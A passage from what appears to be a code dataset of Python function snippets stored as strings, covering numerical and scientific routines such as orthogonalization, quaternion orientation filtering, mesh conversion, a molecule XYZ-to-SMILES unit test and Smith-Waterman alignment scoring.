orthog[j])/sq_norm(orthog[j])\n orthog[i] = basis[i]\n for j in range(i):\n orthog[i] = orthog[i] - mu[i][j] * orthog[j]\n return orthog", "def wigner_gaunt(l1, l2, m):\n pref = sqrt((2*l1 + 1)*(2*l2 + 1)/(4*pi))\n return np.array([pref*sqrt(2*lpp + 1)*float(wigner_3j(l1,l2,lpp,m,-m,0)*wigner_3j(l1,l2,lpp,0,0,0))\n for lpp in range(abs(l1-l2), l1+l2+1, 2)])", "def T(self) -> BaseMatrix:", "def T(self) -> BaseMatrix:", "def interpolator(mat, distance):\n\n# calculate the place of each meassurement relative to the whole yourney of the\n# ship\n gesdistance = np.zeros(len(distance)+1)\n gesdis = distance[0]\n for i in range(1, len(distance)+1):\n gesdistance[i] = gesdistance[i-1] + distance[i-1]\n if i < len(distance):\n gesdis = gesdis + distance[i]\n\n# calculates the minimum distance for number of points of the interpolation\n mini = distance[0]\n for i in range(len(distance)):\n if distance[i] < mini:\n mini = distance[i]\n\n# interpolates linear over every depth\n newmat = np.zeros((len(mat), int(gesdis/mini)))\n\n wth = 0\n for leng in range(len(newmat)):\n newveloc = interp1d(gesdistance, mat[leng, :], kind=\"linear\")\n for wth in range(int(gesdis/mini)):\n newmat[leng, wth] = newveloc(wth*mini)\n for wdth in range(int(gesdis/mini)):\n newvelocdepth = interp1d(np.append(np.arange(0, 458, 20), 458), np.append(newmat[::20, wdth], newmat[457, wdth]), kind=\"linear\")\n for le in range(len(newmat)):\n newmat[le, wdth] = newvelocdepth(le)\n\n return np.flip(newmat), gesdis", "def mixing_matrix_2nu(sth):\n cth = sqrt(1.0-sth*sth)\n\n U00 = cth\n U01 = sth\n U10 = -sth\n U11 = cth\n\n return [[U00,U01],[U10,U11]]", "def _lrt(tup):\n d = np.abs(2 * (tup[0].logLike - tup[1].logLike))\n return chi2.sf(d, np.abs(tup[0].coefs.shape[0] - tup[1].coefs.shape[0]))", "def stairs_4(taille):\n a = np.arange(taille)\n b = np.hstack((a, taille, np.flip(a)))\n return b + b.reshape(-1, 1) # ou b + b[:, np.newaxis]", "def get_tqu(self):\n lx, ly = self.get_lxly()\n tpi = 2. * np.arctan2(lx, -ly)\n\n tfac = np.sqrt((self.nx * self.ny) / (self.dx * self.dy))\n\n tmap = np.fft.irfft2(self.tfft) * tfac\n qmap = np.fft.irfft2(\n np.cos(tpi) * self.efft - np.sin(tpi) * self.bfft) * tfac\n umap = np.fft.irfft2(\n np.sin(tpi) * self.efft + np.cos(tpi) * self.bfft) * tfac\n\n return tqumap(\n self.nx, self.dx, [tmap, qmap, umap], ny=self.ny, dy=self.dy)", "def invgeochart(w):\n # u = torch.asin(w[...,2])\n u = torch.acos(w[...,2])\n # v = torch.acos(w[...,0]/torch.cos(u))\n v = torch.atan(w[...,1]/w[...,0])\n return torch.stack((u,v+np.pi))", "def J(t,y):\n return A", "def TEB2TQU(iS,jS,TEBmat):\n assert TEBmat.shape == (ellmat.rshape[0],ellmat.rshape[1],3,3)\n ret = np.zeros(ellmat.rshape)\n for iX in range(3):\n for jX in range(3):\n ret += apply_RSX(apply_RSX(TEBmat[:,:,iX,jX],iS,iX),jS,jX)\n return ret", "def get_arms(self) -> (list, ob.TurnstileAxis):\n directions = [(0, 1), (1, 0), (0, -1), (-1, 0),\n (1, 1), (-1, 1), (1, -1), (-1, -1)]\n for dire in directions:\n x_neighbour = self.target.x_obj + dire[0]\n y_neighbour = self.target.y_obj + dire[1]\n neighbour = self.grid.obj_list[x_neighbour, y_neighbour]\n if isinstance(neighbour, ob.TurnstileAxis):\n axis = neighbour\n arms = []\n for dire in directions[:4]:\n x_potential_arm = axis.x_obj + dire[0]\n y_potential_arm = axis.y_obj + dire[1]\n potential_arm = self.grid.obj_list[\n x_potential_arm, y_potential_arm]\n if isinstance(potential_arm, ob.TurnstileBloc):\n arms.append(potential_arm)\n return arms, axis", "def qrst_tm_ao(y):\n return (y - (-0.6685))/0.2228", "def T_L(Td, taue):\n return np.sqrt(np.pi)/2.0 * taue * np.exp(-(np.pi*taue/(4*Td))*(np.pi*taue/(4*Td)))", "def approx_matrix(matrix, diagonal, lambdaa):\n\n\tadj_matrix = tf.add(matrix, tf.scalar_mul(lambdaa, diagonal))\n\n\treturn adj_matrix, get_diagonal(adj_matrix)", "def adem_basis_elt_2_map(*, Sq_fn, basis_elt):\r\n return [Sq_fn(Sq) for Sq in basis_elt]", "def f(self,un,tn):\n return -self.a(tn)*un + self.b(tn)", "def ConvertTrisToQuads(self):\n\n self.__do_essential_memebers_exist__()\n if self.element_type == \"quad\":\n return\n assert self.element_type == \"tri\"\n if self.IsHighOrder:\n raise ValueError('High order triangular elements cannot be converted to low/high order quads')\n\n tconv = time()\n\n # SPLIT THE TRIANGLE INTO 3 QUADS BY CONNECTING THE\n # MEDIAN AND MIDPOINTS OF THE TRIANGLE\n\n # FIND MEDIAN OF TRIANGLES\n # median = self.Median()\n median = np.sum(self.points[self.elements,:],axis=1)/self.elements.shape[1]\n # FIND EDGE MIDPOINTS OF TRIANGLES\n mid0 = np.sum(self.points[self.elements[:,:2],:],axis=1)/2.\n mid1 = np.sum(self.points[self.elements[:,[1,2]],:],axis=1)/2.\n mid2 = np.sum(self.points[self.elements[:,[2,0]],:],axis=1)/2.\n\n # STABLE APPROACH\n # points = np.zeros((1,2))\n # for elem in range(self.nelem):\n # quad0 = np.concatenate((self.points[self.elements[elem,0],:][None,:],mid0[elem,:][None,:],\n # median[elem,:][None,:],mid2[elem,:][None,:]),axis=0)\n # quad1 = np.concatenate((self.points[self.elements[elem,1],:][None,:],mid1[elem,:][None,:],\n # median[elem,:][None,:],mid0[elem,:][None,:]),axis=0)\n # quad2 = np.concatenate((self.points[self.elements[elem,2],:][None,:],mid2[elem,:][None,:],\n # median[elem,:][None,:],mid1[elem,:][None,:]),axis=0)\n # points = np.concatenate((points,quad0,quad1,quad2))\n # points = points[1:,:]\n\n points = np.zeros((3*self.nelem*4,2))\n points[::3*4,:] = self.points[self.elements[:,0],:]\n points[1::3*4,:] = mid0\n points[2::3*4,:] = median\n points[3::3*4,:] = mid2\n\n points[4::3*4,:] = self.points[self.elements[:,1],:]\n points[5::3*4,:] = mid1\n points[6::3*4,:] = median\n points[7::3*4,:] = mid0\n\n points[8::3*4,:] = self.points[self.elements[:,2],:]\n points[9::3*4,:] = mid2\n points[10::3*4,:] = median\n points[11::3*4,:] = mid1\n\n\n # KEEP ZEROFY ON, OTHERWISE YOU GET STRANGE BEHVAIOUR\n Decimals = 10\n rounded_points = points.copy()\n makezero(rounded_points)\n rounded_repoints = np.round(rounded_points,decimals=Decimals)\n points, idx_points, inv_points = unique2d(rounded_points,order=False,\n consider_sort=False,return_index=True,return_inverse=True)\n\n elements = np.arange(points.shape[0])[inv_points].reshape(3*self.nelem,4)\n\n self.__reset__()\n\n self.element_type = \"quad\"\n self.elements = elements\n self.points = points\n self.nelem = self.elements.shape[0]\n self.nnode = self.points.shape[0]\n self.GetBoundaryEdgesQuad()\n\n print(\"Triangular to quadrilateral mesh conversion took\", time() - tconv, \"seconds\")", "def SqrtSwap():\n\n return Operator(np.array([[[[ 1.0, 0.0],\n [ 0.0, 0.5 * (1 + 1j)]],\n [[ 0.0, 0.0],\n [ 0.5 * (1 - 1j), 0.0]]],\n [[[ 0.0, 0.5 * (1 - 1j)],\n [ 0.0, 0.0]],\n [[ 0.5 * (1 + 1j), 0.0],\n [ 0.0, 1.0]]]]))", "def updateMARG(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray, dt: float = None) -> np.ndarray:\n _assert_numerical_iterable(q, 'Quaternion')\n _assert_numerical_iterable(gyr, 'Tri-axial gyroscope sample')\n _assert_numerical_iterable(acc, 'Tri-axial accelerometer sample')\n _assert_numerical_iterable(mag, 'Tri-axial magnetometer sample')\n dt = self.Dt if dt is None else dt\n if gyr is None or not np.linalg.norm(gyr) > 0:\n return q\n if mag is None or not np.linalg.norm(mag) > 0:\n return self.updateIMU(q, gyr, acc)\n qDot = 0.5 * q_prod(q, [0, *gyr]) # (eq. 12)\n a_norm = np.linalg.norm(acc)\n if a_norm > 0:\n a = acc/a_norm\n m = mag/np.linalg.norm(mag)\n # Rotate normalized magnetometer measurements\n h = q_prod(q, q_prod([0, *m], q_conj(q))) # (eq. 45)\n bx = np.linalg.norm([h[1], h[2]]) # (eq. 46)\n bz = h[3]\n qw, qx, qy, qz = q/np.linalg.norm(q)\n # Objective function (eq. 31)\n f = np.array([2.0*(qx*qz - qw*qy) - a[0],\n 2.0*(qw*qx + qy*qz) - a[1],\n 2.0*(0.5-qx**2-qy**2) - a[2],\n 2.0*bx*(0.5 - qy**2 - qz**2) + 2.0*bz*(qx*qz - qw*qy) - m[0],\n 2.0*bx*(qx*qy - qw*qz) + 2.0*bz*(qw*qx + qy*qz) - m[1],\n 2.0*bx*(qw*qy + qx*qz) + 2.0*bz*(0.5 - qx**2 - qy**2) - m[2]])\n # Jacobian (eq. 32)\n J = np.array([[-2.0*qy, 2.0*qz, -2.0*qw, 2.0*qx ],\n [ 2.0*qx, 2.0*qw, 2.0*qz, 2.0*qy ],\n [ 0.0, -4.0*qx, -4.0*qy, 0.0 ],\n [-2.0*bz*qy, 2.0*bz*qz, -4.0*bx*qy-2.0*bz*qw, -4.0*bx*qz+2.0*bz*qx],\n [-2.0*bx*qz+2.0*bz*qx, 2.0*bx*qy+2.0*bz*qw, 2.0*bx*qx+2.0*bz*qz, -2.0*bx*qw+2.0*bz*qy],\n [ 2.0*bx*qy, 2.0*bx*qz-4.0*bz*qx, 2.0*bx*qw-4.0*bz*qy, 2.0*bx*qx ]])\n gradient = J.T@f # (eq. 34)\n gradient /= np.linalg.norm(gradient)\n qDot -= self.gain*gradient # (eq. 33)\n q += qDot*dt # (eq. 13)\n q /= np.linalg.norm(q)\n return q", "def project_tangent(w, q, basis):\n w = w - innerprod_q2(w, q) * q\n bo = gram_schmidt(basis)\n\n wproj = w - innerprod_q2(w, bo[0]) * bo[0] - innerprod_q2(w, bo[1]) * bo[1]\n\n return (wproj)", "def orient_2d(p,q,r):\n return (q[0]-p[0])*(r[1]-p[1]) - (r[0]-p[0])*(q[1]-p[1])", "def le(self, x, y):", "def mo_six_hump_camel_func(x, y):\n x1 = x\n x2 = y\n term1 = (4-2.1*x1**2+(x1**4)/3) * x1**2\n term2 = x1*x2\n term3 = (-4+4*x2**2) * x2**2\n # y0 = np.linalg.norm(xvals)\n\n return term1, term2, term3", "def bilorentzian(mu, wid, x, m = 0.5): \n lx = x.shape[0]\n ix = np.where(x == mu)[0][0]\n \n y = np.ones(lx)\n y[0:ix] = lorentzian( mu, wid * m, x[0:ix] )\n y[ix+1:lx] = lorentzian( mu, wid * (1 - m), x[ix+1:lx] ) \n \n return y", "def _stieltjes_analytical(dist, order, normed):\n dimensions = len(dist)\n mom_order = numpy.arange(order+1).repeat(dimensions)\n mom_order = mom_order.reshape(order+1, dimensions).T\n coeff1, coeff2 = dist.ttr(mom_order)\n coeff2[:, 0] = 1.\n\n poly = chaospy.poly.collection.core.variable(dimensions)\n if normed:\n orth = [\n poly**0*numpy.ones(dimensions),\n (poly-coeff1[:, 0])/numpy.sqrt(coeff2[:, 1]),\n ]\n for order_ in range(1, order):\n orth.append(\n (orth[-1]*(poly-coeff1[:, order_])\n -orth[-2]*numpy.sqrt(coeff2[:, order_]))\n /numpy.sqrt(coeff2[:, order_+1])\n )\n norms = numpy.ones(coeff2.shape)\n else:\n orth = [poly-poly, poly**0*numpy.ones(dimensions)]\n for order_ in range(order):\n orth.append(\n orth[-1]*(poly-coeff1[:, order_])\n - orth[-2]*coeff2[:, order_]\n )\n orth = orth[1:]\n norms = numpy.cumprod(coeff2, 1)\n\n return orth, norms, coeff1, coeff2", "def get_stain_matrix(I):", "def get_spin1_alms(map_r, map_trans):\n assert len(map_r) == len(map_trans[0]) == len(map_trans[1])\n alm_r = hp.map2alm(map_r)\n alm_pm = hp.map2alm_spin(map_trans, 1)\n # alm_v = -alm_pm[0]\n # alm_w = -1j*alm_pm[1]\n # return alm_r, alm_v, alm_w\n return alm_r, alm_pm[0], alm_pm[1]", "def quatTrans(q, vA, inv = False):\n #norm = np.sqrt(np.sum(np.asarray(q)**2))\n #if np.abs(1 - norm) < 1e-3:\n # norm = 1\n norm = 1\n q1 = q[0]/norm\n q2 = q[1]/norm\n q3 = q[2]/norm\n qr = q[3]/norm\n q = [q1,q2,q3,qr]\n if inv == True:\n q = [-q1,-q2,-q3,qr]\n else:\n q = [q1,q2,q3,qr]\n mat = Rq(q)\n vB = mat*np.asarray(vA).reshape([3,1])\n return vB", "def stacked_L(robot: RobotPlanar, q: list, q_goal: list):\n LL = []\n LLinv = []\n\n Ts_ee = robot.get_full_pose_fast_lambdify(list_to_variable_dict(q))\n Ts_goal = robot.get_full_pose_fast_lambdify(list_to_variable_dict(q_goal))\n\n for ee in robot.end_effectors:\n\n T_0_ee = SE2_to_SE3(Ts_ee[ee[0]])\n Re = T_0_ee[0:3, 0:3]\n T_0_goal = SE2_to_SE3(Ts_goal[ee[0]])\n Rd = T_0_goal[0:3, 0:3]\n ll, llinv = L(Rd, Re)\n LL.append(np.eye(3))\n LLinv.append(np.eye(3))\n\n LL.append(ll)\n LLinv.append(llinv)\n\n LL = block_diag(*LL)\n LLinv = block_diag(*LLinv)\n\n return LL, LLinv", "def origami_H2_1cyl(l1,l2,l3,h,t):\n l = l1 + l2 + l3\n z = (h-1)*l+1\n x = [None] + range(2,h*l+2)\n for i in xrange(0,h*l,l):\n x[i+l] = i+1\n\n y = [None] + range(l+1,l*h+1) + [None]*l\n for i in xrange(l3):\n y[z + (t+i)%l] = l1+l2+i+1\n for i in xrange(l2):\n y[z + (l3+t+i)%l] = l1+i+1\n for i in xrange(l1):\n y[z + (l3+l2+t+i)%l] = i+1\n\n return Origami(x[1:],y[1:])", "def updateMARG(self, q: np.ndarray, gyr: np.ndarray, acc: np.ndarray, mag: np.ndarray) -> np.ndarray:\n if gyr is None or not np.linalg.norm(gyr)>0:\n return q\n qEst = 0.5 * q_prod(q, [0, *gyr]) # (eq. 12)\n a_norm = np.linalg.norm(acc)\n if a_norm>0:\n a = acc/a_norm\n if mag is None or not np.linalg.norm(mag)>0:\n return self.updateIMU(q, gyr, acc)\n m = mag/np.linalg.norm(mag)\n h = q_prod(q, q_prod([0, *m], q_conj(q))) # (eq. 45)\n bx = np.linalg.norm([h[1], h[2]]) # (eq. 46)\n bz = h[3]\n qw, qx, qy, qz = q/np.linalg.norm(q)\n # Gradient objective function (eq. 31) and Jacobian (eq. 32)\n f = np.array([2.0*(qx*qz - qw*qy) - a[0],\n 2.0*(qw*qx + qy*qz) - a[1],\n 2.0*(0.5-qx**2-qy**2) - a[2],\n 2.0*bx*(0.5 - qy**2 - qz**2) + 2.0*bz*(qx*qz - qw*qy) - m[0],\n 2.0*bx*(qx*qy - qw*qz) + 2.0*bz*(qw*qx + qy*qz) - m[1],\n 2.0*bx*(qw*qy + qx*qz) + 2.0*bz*(0.5 - qx**2 - qy**2) - m[2]]) # (eq. 31)\n J = np.array([[-2.0*qy, 2.0*qz, -2.0*qw, 2.0*qx ],\n [ 2.0*qx, 2.0*qw, 2.0*qz, 2.0*qy ],\n [ 0.0, -4.0*qx, -4.0*qy, 0.0 ],\n [-2.0*bz*qy, 2.0*bz*qz, -4.0*bx*qy-2.0*bz*qw, -4.0*bx*qz+2.0*bz*qx],\n [-2.0*bx*qz+2.0*bz*qx, 2.0*bx*qy+2.0*bz*qw, 2.0*bx*qx+2.0*bz*qz, -2.0*bx*qw+2.0*bz*qy],\n [ 2.0*bx*qy, 2.0*bx*qz-4.0*bz*qx, 2.0*bx*qw-4.0*bz*qy, 2.0*bx*qx ]]) # (eq. 32)\n gradient = J.T@f # (eq. 34)\n gradient /= np.linalg.norm(gradient)\n qEst -= self.gain*gradient # (eq. 33)\n q += qEst*self.Dt # (eq. 13)\n q /= np.linalg.norm(q)\n return q", "def wt_time_Locs(wt, loc):\n return (wt * loc)", "def trapezoid_area(lower, leg , upper):\n area = (((upper+lower)/2)*leg)\n return area", "def get_y(EQ, M):\n return (EQ[1] * ((-1) * EQ[0] * M[0] + EQ[1] * M[1]) - EQ[0] * EQ[2]) / (EQ[1] ** 2 + EQ[0] ** 2)", "def spectral_laplace(x_values, dd_math_function, sigma, ua, ub):\n B = []\n for x in x_values:\n B += [-dd_math_function(x, sigma)]\n B[0] = ua\n B[len(x_values) - 1] = ub\n #B ferdig\n A=[]\n for i in range (len(x_values)):\n a = []\n for j in range (len(x_values)):\n if i == 0 or i == len(x_values) - 1:\n a.append(lagrange(x_values, j, x_values[i]))\n else:\n a.append(dd_lagrange(x_values, j, x_values[i]))\n A.append(a)\n #A ferdig\n return np.linalg.solve(A, B)", "def rayleigh(th,r,wl,a,n1,n2):\n c = np.cos(th)\n c2,s2 = c**2, np.sin(th)**2\n k = 2*np.pi/wl\n n_2 = n2**2/n1**2\n m = (k**4)*(a**6)*(abs(n_2-1)**2) / ((abs(n_2+2)**2) * 2 * (r**2))\n return m*np.array([[1+c2 , -s2 , 0 , 0],\n [-s2 , 1+c2 , 0 , 0],\n [0 , 0 , 2*c , 0],\n [0 , 0 , 0 , 2*c]])", "def _gu_bilinear(self, h, r):\n mu1h = torch.matmul(self.mu1.weight, h.T) # [k, b]\n mu2r = torch.matmul(self.mu2.weight, r.T) # [k, b]\n return (mu1h * mu2r + self.bu.weight).T # [b, k]", "def test_xyz_to_smiles(self):\n xyz1 = \"\"\"S -0.06618943 -0.12360663 -0.07631983\nO -0.79539707 0.86755487 1.02675668\nO -0.68919931 0.25421823 -1.34830853\nN 0.01546439 -1.54297548 0.44580391\nC 1.59721519 0.47861334 0.00711000\nH 1.94428095 0.40772394 1.03719428\nH 2.20318015 -0.14715186 -0.64755729\nH 1.59252246 1.51178950 -0.33908352\nH -0.87856890 -2.02453514 0.38494433\nH -1.34135876 1.49608206 0.53295071\"\"\"\n\n xyz2 = \"\"\"O 2.64631000 -0.59546000 0.29327900\nO 2.64275300 2.05718500 -0.72942300\nC 1.71639100 1.97990400 0.33793200\nC -3.48200000 1.50082200 0.03091100\nC -3.85550400 -1.05695100 -0.03598300\nC 3.23017500 -1.88003900 0.34527100\nC -2.91846400 0.11144600 0.02829400\nC 0.76935400 0.80820200 0.23396500\nC -1.51123800 -0.09830700 0.09199100\nC 1.28495500 -0.50051800 0.22531700\nC -0.59550400 0.98573400 0.16444900\nC -0.94480400 -1.39242500 0.08331900\nC 0.42608700 -1.59172200 0.14650400\nH 2.24536500 1.93452800 1.29979800\nH 1.14735500 2.91082400 0.31665700\nH -3.24115200 2.03800800 0.95768700\nH -3.08546100 2.10616100 -0.79369800\nH -4.56858900 1.48636200 -0.06630800\nH -4.89652000 -0.73067200 -0.04282300\nH -3.69325500 -1.65970000 -0.93924100\nH -3.72742500 -1.73294900 0.81894100\nH 3.02442400 -2.44854700 -0.56812500\nH 4.30341500 -1.72127600 0.43646000\nH 2.87318600 -2.44236600 1.21464900\nH -0.97434200 2.00182800 0.16800300\nH -1.58581300 -2.26344700 0.02264400\nH 0.81122400 -2.60336100 0.13267800\nH 3.16280800 1.25020800 -0.70346900\"\"\"\n\n xyz3 = \"\"\"N 2.24690600 -0.00006500 0.11597700\nC -1.05654800 1.29155000 -0.02642500\nC -1.05661400 -1.29150400 -0.02650600\nC -0.30514100 0.00000200 0.00533200\nC 1.08358900 -0.00003400 0.06558000\nH -0.39168300 2.15448600 -0.00132500\nH -1.67242600 1.35091400 -0.93175000\nH -1.74185400 1.35367700 0.82742800\nH -0.39187100 -2.15447800 0.00045500\nH -1.74341400 -1.35278100 0.82619100\nH -1.67091600 -1.35164600 -0.93286400\"\"\"\n\n xyz4 = \"\"\"C -0.86594600 0.19886100 2.37159000\nC 0.48486900 -0.16232000 1.75422500\nC 1.58322700 0.83707500 2.14923200\nC 0.88213600 -1.51753600 2.17861400\nN 1.17852900 -2.57013900 2.53313600\nN 0.51051200 -0.21074800 0.26080100\nN -0.51042000 0.21074000 -0.26079600\nC -0.48479200 0.16232300 -1.75422300\nC 0.86590400 -0.19926100 -2.37161200\nC -1.58344900 -0.83674100 -2.14921800\nC -0.88166600 1.51765700 -2.17859800\nN -1.17777100 2.57034900 -2.53309500\nH -1.16019200 1.20098300 2.05838400\nH -1.64220300 -0.50052400 2.05954500\nH -0.78054100 0.17214100 3.45935000\nH 1.70120000 0.85267300 3.23368300\nH 2.53492600 0.56708700 1.69019900\nH 1.29214500 1.83331400 1.80886700\nH 1.15987300 -1.20145600 -2.05838100\nH 0.78046800 -0.17257000 -3.45937100\nH 1.64236100 0.49992400 -2.05962300\nH -2.53504500 -0.56650600 -1.69011500\nH -1.70149200 -0.85224500 -3.23366300\nH -1.29263300 -1.83308300 -1.80892900\"\"\"\n\n xyz5 = \"\"\"O 0.90973400 -0.03064000 -0.09605500\nO 0.31656600 -0.00477100 -1.21127600\nO 2.17315400 -0.03069900 -0.09349100\"\"\"\n\n xyz6 = \"\"\"S 0.38431300 0.05370100 0.00000000\nN -1.13260000 0.07859900 0.00000000\nH 0.85151800 -1.28998600 0.00000000\"\"\"\n\n xyz7 = \"\"\"N 0.00000000 0.00000000 0.44654700\nN 0.00000000 0.00000000 -0.77510900\nH 0.86709400 0.00000000 1.02859700\nH -0.86709400 0.00000000 1.02859700\"\"\"\n\n xyz8 = \"\"\"N 0.00000000 0.00000000 0.65631400\nC 0.00000000 0.00000000 -0.50136500\nH 0.00000000 0.00000000 -1.57173600\"\"\"\n\n# xyz9 = \"\"\"S -0.00866000 -0.60254900 0.00000000\n# N -0.96878800 0.63275900 0.00000000\n# N 1.01229100 0.58298500 0.00000000\"\"\"\n#\n# xyz10 = \"\"\"O -0.79494500 -0.93969200 0.00000000\n# O -0.32753500 1.24003800 0.00000000\n# O 1.28811400 -0.24729000 0.00000000\n# N 0.14143500 0.11571500 0.00000000\n# H -1.65602000 -0.48026800 0.00000000\"\"\"\n#\n# xyz11 = \"\"\"O 1.64973000 -0.57433600 0.02610800\n# O 0.49836300 1.28744800 -0.18806200\n# N -0.57621600 -0.65116600 0.24595200\n# N -1.78357200 -0.10211200 -0.14953800\n# N 0.61460400 0.08152700 -0.00952700\n# H -0.42001200 -1.61494900 -0.03311600\n# H -1.72480300 0.33507600 -1.06884500\n# H -2.07362100 0.59363400 0.53038600\"\"\"\n\n xyz12 = \"\"\"O 1.10621000 0.00000000 -0.13455300\nO -1.10621000 0.00000000 -0.13455300\nN 0.00000000 0.00000000 0.33490500\"\"\"\n\n# xyz13 = \"\"\"O -0.37723000 -1.27051900 0.00000000\n# N -0.12115000 -0.04252600 0.00000000\n# N -0.95339100 0.91468300 0.00000000\n# C 1.31648000 0.33217600 0.00000000\n# H 1.76422500 -0.11051900 -0.89038300\n# H 1.76422500 -0.11051900 0.89038300\n# H 1.40045900 1.41618100 0.00000000\n# H -1.88127600 0.47189500 0.00000000\"\"\"\n\n xyz14 = \"\"\"S -0.12942800 0.11104800 0.22427200\nO 0.98591500 -1.00752300 -0.31179100\nO -1.43956200 -0.44459900 -0.15048900\nO 0.32982400 1.44755400 -0.21682700\nH 1.85512700 -0.56879900 -0.36563700\"\"\"\n\n xyz15 = \"\"\"N 1.11543700 0.11100500 0.00000000\nN -0.11982300 -0.03150800 0.00000000\nN -1.25716400 0.01530300 0.00000000\nH 1.57747800 -0.80026300 0.00000000\"\"\"\n\n xyz16 = \"\"\"O 1.21678000 -0.01490600 0.00000000\nN 0.04560300 0.35628400 0.00000000\nC -1.08941100 -0.23907800 0.00000000\nH -1.97763400 0.37807800 0.00000000\nH -1.14592100 -1.32640500 0.00000000\"\"\"\n\n xyz17 = \"\"\"S 0.00000000 0.00000000 0.18275300\nO -0.94981300 -0.83167500 -0.84628900\nO 0.94981300 0.83167500 -0.84628900\nO 0.80426500 -0.99804200 0.85548500\nO -0.80426500 0.99804200 0.85548500\nH -1.67833300 -0.25442300 -1.13658700\nH 1.67833300 0.25442300 -1.13658700\"\"\"\n\n xyz18 = \"\"\"S 0.00000000 0.00000000 0.12264300\nO 1.45413200 0.00000000 0.12264300\nO -0.72706600 1.25931500 0.12264300\nO -0.72706600 -1.25931500 0.12264300\"\"\"\n\n xyz19 = \"\"\"N 1.16672400 0.35870400 -0.00000400\nN -1.16670800 0.35879500 -0.00000400\nC -0.73775600 -0.89086600 -0.00000100\nC 0.73767000 -0.89093000 -0.00000100\nC 0.00005200 1.08477000 -0.00000500\nH -1.40657400 -1.74401100 0.00000000\nH 1.40645000 -1.74411900 0.00000000\nH 0.00009400 2.16788100 -0.00000700\"\"\"\n\n xyz20 = \"\"\"C 3.09980400 -0.16068000 0.00000600\nC 1.73521600 0.45534600 -0.00002200\nC 0.55924400 -0.24765400 -0.00000300\nC -0.73300200 0.32890400 -0.00001600\nC -1.93406200 -0.42115800 0.00001300\nC -3.19432700 0.11090700 0.00000900\nH 3.67991400 0.15199400 -0.87914100\nH 3.67984100 0.15191400 0.87923000\nH 3.04908000 -1.25419800 -0.00004300\nH 1.68713300 1.54476700 -0.00005100\nH -0.81003200 1.41627100 -0.00004600\nH -1.83479400 -1.50747300 0.00004100\nH 0.61489300 -1.33808300 0.00002500\nH -3.35410300 1.18597200 -0.00001700\nH -4.07566100 -0.52115800 0.00003300\"\"\"\n\n mol1 = converter.molecules_from_xyz(converter.str_to_xyz(xyz1))[1]\n mol2 = converter.molecules_from_xyz(converter.str_to_xyz(xyz2))[1]\n mol3 = converter.molecules_from_xyz(converter.str_to_xyz(xyz3))[1]\n mol4 = converter.molecules_from_xyz(converter.str_to_xyz(xyz4))[1]\n mol5 = converter.molecules_from_xyz(converter.str_to_xyz(xyz5))[1]\n mol6 = converter.molecules_from_xyz(converter.str_to_xyz(xyz6), multiplicity=1)[1]\n mol7 = converter.molecules_from_xyz(converter.str_to_xyz(xyz7), multiplicity=1)[1]\n mol8 = converter.molecules_from_xyz(converter.str_to_xyz(xyz8))[1]\n # mol9 = converter.molecules_from_xyz(converter.str_to_xyz(xyz9), multiplicity=1)[1]\n # mol10 = converter.molecules_from_xyz(converter.str_to_xyz(xyz10))[1]\n # mol11 = converter.molecules_from_xyz(converter.str_to_xyz(xyz11))[1]\n mol12 = converter.molecules_from_xyz(converter.str_to_xyz(xyz12))[1]\n # mol13 = converter.molecules_from_xyz(converter.str_to_xyz(xyz13))[1]\n mol14 = converter.molecules_from_xyz(converter.str_to_xyz(xyz14))[1]\n mol15 = converter.molecules_from_xyz(converter.str_to_xyz(xyz15))[1]\n mol16 = converter.molecules_from_xyz(converter.str_to_xyz(xyz16))[1]\n mol17 = converter.molecules_from_xyz(converter.str_to_xyz(xyz17))[1]\n mol18 = converter.molecules_from_xyz(converter.str_to_xyz(xyz18))[1]\n mol19 = converter.molecules_from_xyz(converter.str_to_xyz(xyz19))[1]\n mol20 = converter.molecules_from_xyz(converter.str_to_xyz(xyz20))[1]\n\n self.assertEqual(mol1.to_smiles(), '[NH-][S+](=O)(O)C')\n self.assertIn(mol2.to_smiles(), ['COC1=C(CO)C=C([C](C)C)C=C1', 'COC1C=CC(=CC=1CO)[C](C)C'])\n self.assertEqual(mol3.to_smiles(), '[N]=C=C(C)C')\n self.assertEqual(mol4.to_smiles(), 'N#CC(N=NC(C#N)(C)C)(C)C')\n self.assertEqual(mol5.to_smiles(), '[O-][O+]=O')\n self.assertEqual(mol6.to_smiles(), 'N#S')\n self.assertEqual(mol7.to_smiles(), '[N-]=[NH2+]')\n self.assertEqual(mol8.to_smiles(), 'C#N')\n # self.assertEqual(mol9.to_smiles(), '[N-]=[S+]#N') # gives [N]S#N, multiplicity 3\n # self.assertEqual(mol10.to_smiles(), '[N+](=O)(O)[O-]') # gives None\n # self.assertEqual(mol11.to_smiles(), 'N(N)[N+](=O)[O-]') # gives None\n self.assertEqual(mol12.to_smiles(), '[O]N=O')\n # self.assertEqual(mol13.to_smiles(), 'C[N+]([NH-])=O') # gives None\n self.assertEqual(mol14.to_smiles(), '[O]S(=O)O')\n self.assertEqual(mol15.to_smiles(), '[N-]=[N+]=N')\n self.assertEqual(mol16.to_smiles(), '[O]N=C')\n self.assertEqual(mol17.to_smiles(), '[O-][S+](=O)(O)O')\n self.assertEqual(mol18.to_smiles(), 'O=S(=O)=O')\n self.assertEqual(mol19.to_adjacency_list(), \"\"\"multiplicity 2\n1 N u1 p1 c0 {4,S} {5,S}\n2 N u0 p1 c0 {3,S} {5,D}\n3 C u0 p0 c0 {2,S} {4,D} {6,S}\n4 C u0 p0 c0 {1,S} {3,D} {7,S}\n5 C u0 p0 c0 {1,S} {2,D} {8,S}\n6 H u0 p0 c0 {3,S}\n7 H u0 p0 c0 {4,S}\n8 H u0 p0 c0 {5,S}\n\"\"\") # cannot read SMILES 'c1ncc[n]1' (but can generate them)\n self.assertEqual(mol20.to_smiles(), 'C=C[CH]C=CC')", "def smith_waterman_fill(self):\r\n\r\n matrix = self.empty_matrix() # Building on the previous definition\r\n\r\n def score_cell(i,j):\r\n \"\"\"\r\n This scoreing definition will return the score of\r\n a position (i, j) based on the left, upper, and upper left values.\r\n Your scoring function should:\r\n * Choose the maximum of the following 4 values for the score\r\n * the value of (i-1, j) + insertion/deletion penalty\r\n * the value of (i, j-1) + insertion/deletion penalty\r\n * If the characters at i-1 and j-1 in s1 and s2 respectively match:\r\n the value of (i-1, j-1) + match score\r\n else\r\n the value of (i-1, j-1) + mismatch penalty\r\n * 0 (if all other numbers are negative, use 0)\r\n :param i: integer, the outer list index\r\n :param j: integer, the inner list index\r\n :return: integer\r\n \"\"\"\r\n match = 3\r\n mismatch = -3\r\n ins_del = -2\r\n \r\n up = matrix[i-1][j]+ ins_del\r\n left = 